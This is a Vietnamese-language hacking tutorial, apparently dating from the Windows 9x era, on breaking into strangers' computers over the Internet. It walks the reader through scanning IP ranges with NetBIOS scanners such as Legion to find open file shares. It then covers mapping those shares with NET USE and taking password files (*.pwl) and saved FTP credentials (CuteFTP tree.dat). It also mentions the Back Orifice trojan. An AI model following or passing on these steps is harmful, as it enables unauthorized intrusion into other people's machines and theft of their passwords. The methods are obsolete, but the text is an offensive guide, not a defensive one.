Xâm nhập PC khác khi đang Online :

Thông thường một hacker trước khi xâm nhập máy tính, thường cố gắng cài một Trojan mở cổng để xâm
nhập, nổi tiếng nhất là Trojan Back orffice.

Bài học này sẽ chỉ cho bạn làm thế nào có thể kết nối với một máy tính cài Windows thông qua Internet và
có thể lấy thông tin của chúng.

Công cụ cần thiết :

Ðầu tiên là bạn cần là một chương trình scan gọi là Netbios scaner. Tôi dùng Legion hoặc
Winhackgold ( Download ở đây ). Chương trình sẽ scan tất cả các máy có mở chia sẻ file
trên cùng một netbios.

Bắt đầu :

Sau khi kết nối vào mạng, bạn vào Start/Run rồi đánh winipcfg, bạn sẽ nhận được một
địa chỉ IP mà ISP gán cho bạn mỗi khi bạn kết nối, nếu bạn kết nối bằng Modem thì số IP
này sẽ thay đổi gọi là IP động.Trong mục SCAN FROM của Legion bạn hãy đánh địa chỉ IP
của mình vào. Ví dụ tôi có 203.160.11.48 thì tôi đánh trong Legion on là 203.160.11 thôi.
Bây giờ ở mục TO của Legion bạn đánh 203.160.xx (xx là địa chỉ IP bất kì bạn đánh vào,
bạn nên đánh số gần nhất với IP của mình, tôi chọn số 12).

Bây giờ ấn nút SCAN, Legion sẽ bắt đầu scan và cho tất cả các địa chỉ IP nó tìm thấy 1 -
254. Nếu bạn may mắn thì khi chọn một địa chỉ IP thì bạn sẽ nhìn thấy như sau :

Shared resources at \\206.11.11.42

Sharename Type Comment

----------------------------------------------
A Disk Floppy

CDRIVE Disk C:\ Drive

DDRIVE Disk D:\ Drive

CDROM Disk CD-Rom Read Only

The command was completed successfully.

Hãy click vào địa chỉ IP đó với các lệnh của USE NET bạn sẽ có quyền kiểm soát địa chỉ IP
đó.

Trong cửa sổ DOS-Promt bạn hãy sử dụng các lệnh sau:

NET USE [drive: | *] [\\computer\directory [password | ?]]

[/SAVEPW:NO] [/YES] [/NO]

NET USE [port:] [\\computer\printer [password | ?]]

[/SAVEPW:NO] [/YES] [/NO]

NET USE drive: | \\computer\directory /DELETE [/YES]

NET USE port: | \\computer\printer /DELETE [/YES]

NET USE * /DELETE [/YES]

NET USE drive: | * /HOME

drive Specifies the drive letter you assign to ashared directory.

* Specifies the next available drive letter.

If used with /DELETE, specifies to disconnect all of your connections.port Specifies the
parallel (LPT) port name you assign to a shared printer.computer Specifies the name of
the computer sharing the resource.directory Specifies the name of the shared
directory.printer Specifies the name of the shared printer.password Specifies the password
for the shared resource, if any.

? Specifies that you want to be prompted for the password of the shared resource. You
don't need to use this option unless the password is optional.

/SAVEPW:NO Specifies that the password you typeshould not be saved in your password-
listfile. You need to retype the password the next time you connect to this resource.

/YES Carries out the NET USE command without first prompting you to provide
information or confirm actions.

/DELETE Breaks the specified connection to a shared resource.

/NO Carries out the NET USE command, responding with NO automatically when you are
prompted to confirm actions.

/HOME Makes a connection to your HOME directory if one is specified in your LAN
Manager or Windows NT user account.

To list all of your connections, type NET USE without options.

To see this information one screen at a time, type the following at the command prompt:

NET USE /? | MORE

or
NET HELP USE | MORE

Sau khi xâm nhập bạn cần lấy các thông tin của IP
này ! Hãy vào những cái có kiểu \program
files\cutètp\tree.dat, \mirc\download, windows\*.pwl
...